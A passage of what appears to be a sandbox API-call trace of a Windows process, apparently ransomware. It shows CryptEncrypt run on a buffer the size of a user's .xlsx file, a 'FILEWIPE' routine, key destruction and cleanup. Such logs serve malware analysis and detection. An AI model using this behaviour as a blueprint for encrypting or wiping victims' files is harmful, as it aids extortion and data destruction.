wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0032.837] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0032.837] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0032.837] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0032.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0032.837] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.837] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0032.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0032.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0032.837] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.837] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0032.838] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.838] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x106c8, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x106d0) returned 1 [0032.838] CharLowerBuffW (in: lpsz="byte[67281]", cchLength=0xb | out: lpsz="byte[67281]") returned 0xb [0032.840] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.840] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.841] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8a0680*, pdwDataLen=0x6ae220*=0x106c8, dwBufLen=0x106d0 | out: pbData=0x8a0680*, pdwDataLen=0x6ae220*=0x106d0) returned 1 [0032.843] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0032.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.843] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0032.844] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.848] TranslateMessage (lpMsg=0x6aed6c) returned 0 [0032.848] DispatchMessageW (lpMsg=0x6aed6c) returned 0x0 [0032.848] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ae408) returned 1 [0032.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0032.849] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0032.849] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0032.849] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.853] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0032.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.853] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.853] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.853] CryptDestroyKey (hKey=0x7c2280) returned 1 [0032.853] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0032.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.854] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0032.854] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0032.854] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0032.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0032.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.854] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0032.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.854] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0032.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0032.854] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0032.854] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0032.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0032.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0032.854] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0032.854] CryptReleaseContext (hProv=0x7d5c40, dwFlags=0x0) returned 1 [0032.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da358 [0032.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0032.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0032.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0032.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.854] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0032.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0032.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0032.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0032.855] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.855] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0032.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0032.856] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0032.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0032.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cee0 [0032.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0032.856] FreeLibrary (hLibModule=0x754b0000) returned 1 [0032.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0032.856] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0032.856] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0032.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0032.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.856] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0032.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0032.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0032.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0032.856] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0032.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0032.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc58 [0032.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0032.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cee0 [0032.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889538 [0032.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889910 [0032.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0032.856] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0032.857] CloseHandle (hObject=0x128) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0032.857] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0032.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da358 [0032.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0032.857] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0032.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889910 [0032.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889538 [0032.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cee0 [0032.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0032.857] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cf10 [0032.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc58 [0032.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0032.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0032.858] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0032.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0032.858] CloseHandle (hObject=0x140) returned 1 [0032.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0032.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0032.859] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0032.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0032.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0032.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0032.860] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0032.860] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0032.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0032.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0032.860] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0032.861] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0032.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0032.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0032.861] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0032.861] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0032.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0032.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0032.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.861] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5f8 [0032.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1af8 [0032.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0032.861] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0032.862] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\7hWyNz2k.xlsx", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67004760, ftCreationTime.dwHighDateTime=0x1d58643, ftLastAccessTime.dwLowDateTime=0x23634540, ftLastAccessTime.dwHighDateTime=0x1d5b4e0, ftLastWriteTime.dwLowDateTime=0x23634540, ftLastWriteTime.dwHighDateTime=0x1d5b4e0, nFileSizeHigh=0x0, nFileSizeLow=0x106c8, dwReserved0=0x0, dwReserved1=0x777648, cFileName="7hWyNz2k.xlsx", cAlternateFileName="7HWYNZ~1.XLS")) returned 0x7c2100 [0032.862] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0032.862] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0032.862] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0032.862] RtlAllocateHeap 